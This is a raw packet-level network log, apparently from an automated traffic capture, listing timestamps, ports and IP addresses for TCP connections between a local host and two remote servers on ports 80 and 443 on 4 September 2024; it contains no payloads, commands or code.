Sep 4, 2024 17:37:08.138746977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138746977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138757944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138771057 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138777971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138787985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138792992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138797998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138803005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138808966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138818979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138824940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138828993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138834953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138839960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138850927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138851881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138863087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138870001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138887882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138907909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139466047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139477015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139484882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139494896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139503956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139513016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139520884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139523029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139534950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139544010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139549971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139553070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139564991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139569044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139590025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139601946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139614105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139625072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139633894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139643908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139647961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139655113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139666080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139671087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139693975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139700890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139799118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139813900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139823914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139833927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139842987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139853954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.139867067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.139892101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140264988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140275955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140285969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140295982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140309095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140326977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140399933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140446901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140603065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140614033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140624046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140635967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140641928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140646935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140657902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140657902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140676975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140688896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140692949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140713930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140732050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140746117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140758038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140767097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140777111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140786886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140789986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140799999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140810966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140810966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140839100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140856981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140882969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140893936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140902996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140913963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140923977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140927076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140937090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140948057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.140959978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.140990019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141025066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141037941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141047955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141060114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141068935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141069889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141092062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141117096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141145945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141158104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141184092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141195059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141674042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141688108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141697884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141709089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141716003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141719103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141724110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141731977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141742945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141758919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141773939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141812086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141823053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141833067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141844988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141853094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141855001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141868114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141872883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141880035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141896009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141921043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.141969919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141980886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.141992092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142003059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142011881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142011881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142020941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142026901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142038107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142047882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142072916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142261028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142271996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142281055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142297983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142308950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142313004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142322063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142352104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142443895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142460108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142469883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142481089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142489910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142491102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142504930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142509937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142533064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142549038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142549992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142560959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142570019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142580986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142586946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142599106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142602921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142616034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142621040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142627954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142632961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142641068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142642021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142653942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142661095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142664909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142678022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142683983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142688990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142695904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142700911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142713070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142721891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142741919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142749071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142760992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142764091 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142790079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142796993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.142925024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.142962933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143424988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143436909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143445969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143467903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143486023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143644094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143656015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143666029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143676996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143683910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143688917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143699884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143711090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143711090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143722057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143747091 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143758059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143758059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143769026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143780947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143791914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143791914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143805027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.143805981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143826008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.143857956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144088030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144100904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144128084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144140005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144295931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144310951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144320965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144331932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144342899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144345045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144355059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144356966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144368887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144380093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144383907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144392014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144402981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144402981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144414902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144421101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144444942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144445896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144459009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144462109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144474983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144506931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144506931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144514084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144520998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144532919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144542933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144556046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144561052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144568920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.144578934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144613028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.144697905 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.144721031 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.144757986 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.144768000 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.144785881 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.144813061 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.145319939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145373106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145384073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145401955 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.145417929 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.145428896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.145432949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145446062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145457983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145457983 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.145466089 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.145478010 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.145478010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.145502090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.145502090 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.145598888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145610094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145618916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145628929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145636082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.145644903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145647049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.145685911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.145785093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145798922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145808935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.145821095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.145848989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.145991087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146004915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146015882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146028996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146033049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146044970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146050930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146056890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146068096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146069050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146080017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146090984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146097898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146101952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146111012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146120071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146131992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146143913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146153927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146155119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146167040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146178007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146178961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146192074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146202087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146203041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146214008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146225929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146231890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146241903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146256924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146285057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146296978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146306038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146317959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146327019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146333933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146346092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146357059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146363020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146377087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146397114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146883965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146897078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146907091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146919966 CEST	80	49719	147.45.44.104	192.168.2.6
